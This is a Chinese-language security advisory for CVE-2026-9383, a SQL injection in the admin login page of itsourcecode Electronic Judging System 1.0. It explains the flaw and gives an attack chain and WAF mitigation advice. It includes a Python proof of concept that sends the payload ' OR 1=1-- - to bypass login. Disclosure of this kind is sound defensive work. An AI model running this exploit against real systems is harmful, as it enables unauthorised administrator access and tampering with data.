CVE-2026-9383 CVSS 7.3 高危

CVE-2026-9383: Electronic Judging System SQL注入漏洞

披露日期: 2026-05-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9383

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Electronic Judging System

漏洞概述

itsourcecode Electronic Judging System 1.0版本中存在严重的安全漏洞。该漏洞位于`/intrams/admin/login.php`文件中，由于未对用户输入的`Username`参数进行有效的过滤和验证，导致攻击者可以构造恶意的SQL语句并注入到后端数据库查询中。由于该漏洞无需认证且无需用户交互即可通过网络远程利用，攻击者可能导致敏感信息泄露、数据被篡改或服务不可用，对系统安全构成严重威胁。

技术细节

该漏洞的根本原因是应用程序在构建SQL查询时采用了直接字符串拼接的方式，未使用预编译语句或ORM框架。具体而言，在`/intrams/admin/login.php`处理登录逻辑时，`Username`参数被直接拼接到SQL语句中并执行。攻击者可以利用这一缺陷，通过在用户名字段输入特定的SQL载荷（如 `' OR '1'='1` 或 `UNION SELECT...`），欺骗数据库执行非预期命令。这使得攻击者能够绕过身份验证机制（无需密码即可登录管理员账户），或提取、修改、删除数据库中的任意数据。CVSS 3.1评分7.3表明该漏洞利用难度低，危害性较高。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是itsourcecode Electronic Judging System 1.0，并定位到登录页面/intrams/admin/login.php。

STEP 2

漏洞探测

攻击者在Username参数中输入单引号或其他特殊字符，观察应用响应是否出现数据库语法错误或行为异常，以确认SQL注入点的存在。

STEP 3

漏洞利用

攻击者构造特定的SQL注入Payload（如万能密码' OR '1'='1），通过POST请求发送至服务器，欺骗后端数据库验证通过。

STEP 4

达成目标

成功绕过身份验证，以管理员身份登录后台，进而可能导致数据泄露（C:L）、数据篡改（I:L）或服务中断（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sqli(target_url):
    """
    PoC for CVE-2026-9383 SQL Injection in Username parameter.
    Target: /intrams/admin/login.php
    """
    login_url = f"{target_url}/intrams/admin/login.php"
    
    #_payload = "admin' OR '1'='1" # Simple bypass payload
    payload = "' OR 1=1-- -" # Comment based payload
    
    data = {
        "Username": payload,
        "Password": "randomtext"
    }
    
    try:
        response = requests.post(login_url, data=data, timeout=10)
        if response.status_code == 200 and "dashboard" in response.text.lower():
            print("[+] Exploit successful! SQL Injection confirmed.")
            print(f"[+] Response length: {len(response.text)}")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    exploit_sqli(target)

影响范围

itsourcecode Electronic Judging System 1.0

防御指南

临时缓解措施

建议立即在网络边界（如WAF）部署针对SQL注入攻击的防护规则，拦截包含单引号、UNION、SELECT等关键字的恶意请求。同时，暂时关闭系统对外的非必要访问接口，直至完成漏洞修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9383
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9383
3 Details https://www.cvedetails.com/cve/CVE-2026-9383/
4 VulDB https://vuldb.com/cve/CVE-2026-9383
5 Link https://github.com/nidieaaa/test/issues/11
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/submit/813427
8 Link https://vuldb.com/vuln/365346
9 Link https://vuldb.com/vuln/365346/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表